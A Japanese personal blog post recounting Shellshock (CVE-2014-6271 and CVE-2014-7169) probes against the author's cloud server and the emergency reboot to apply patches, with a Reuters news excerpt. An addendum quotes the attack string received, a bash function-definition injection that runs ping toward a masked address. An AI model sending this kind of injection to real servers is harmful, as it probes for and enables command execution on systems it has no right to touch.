bashの脆弱性(CVE-2014-6271)で大騒ぎ中
関連記事
- 【#AMD】Ryzen CPUなうちのマザボのBIOSをアップデートしたげな【CVE-2023-31315】 【2024年10月13日(日)】
- 【#AMD】Ryzen CPUにBIOSへ不正アプリをインストールできる脆弱性【CVE-2023-31315】 【2024年08月10日(土)】
- #OpenSSH の脆弱性 CVE-2024-6387,らしい...ドロドロドロ 【2024年07月02日(火)】
- 【#Windows】Wi-Fiに関する脆弱性発覚。全Windowsユーザーは今すぐアップデートを 【2024年06月26日(水)】
- IntelのCPUに新たな脆弱性、Downfall。第6世代Skylakeから第11世代Rocket Lakeまで影響。情報漏えいの恐れ 【2023年08月09日(水)】
うへっ!OpenSSLに続いてまたかいな
って,すでにうちのクラウドサーバーにも攻撃が始まっておった(汗
とりあえず,第一防壁で全て跳ね返しておるが
CVE-2014-6271なパッチは,昨日確認したら,当たってた
んが,CVE-2014-7169がまだ当たっていない(滝汗
いや,再起動すれば,パッチは当たるんじゃが
現場が今使ってやがる
緊急リブートしたいぞぉ~~
稼働ログとにらめっこして,リブートタイミングを図っているぞい
っちゅうか,今回のセキュリティバグも,かなりお粗末すぎるぞい
これ,民生ルーターとか大丈夫じゃろか?Linuxで動いているブツ,けっこうあるがのぉ
【追記】
こんな物騒なコマンド,投げつけてきてまする
“() { :; }; /bin/ping -c 1 ***.***.***.***”
パッチが当たってないと,このpingが「サーバー内」で起動かかって,サーバーから目的のアドレスにpingを飛ばすってやつですな
んで,「穴が空いてるじぃ~」をハッカーさんへ御連絡
んで,本攻撃が始まると((((;゚Д゚))))ガクガクブルブル
ってことで,サーバーを緊急リブートして,全てのパッチを当てましたっす(;´Д`)ハァハァ
UNIX系のソフト「bash」に重大バグ、システム乗っ取りも
[ボストン 24日 ロイター] – 基本ソフト(OS)Linux(リナックス)上で広く使われているソフトウエア「bash」に、新しくセキュリティー上のバグがあることが分かった。専門家らが24日警告した。4月に発覚したオンラインのデータ暗号化ソフトのバグ「ハートブリード」より大きな被害を引き起こす危険性があるという。 (以下略) |
ロイター |
コメント
「侍ジャパン」宮崎県入り 「プレミア12」向け きょうから合宿
【#総選挙】 衆議院選挙 きょう投票 ...ドロドロドロ(24/10/27)
【#線状降水帯】宮崎 延岡「土砂崩れで家がつぶれている」通報 1人不明(24/10/23)
【冬】お~日本海に筋雲が出ちょる!冬がキター
【#寒冷前線】13時頃30℃の気温が今は25℃無いぞー
【訃報】 俳優の西田敏行さん亡くなる 76歳 東京の自宅で
【#台風】衆議院議員選挙の投票日に超大型台風が直撃!なのか?(24/10/17)
【#キロタン】奄美地方(鹿児島県)記録的短時間大雨情報 第1号(24/10/16)
生駒高原へコスモスを見物しに行ってみた
急激に寒くなってキター 晩秋がやってきた!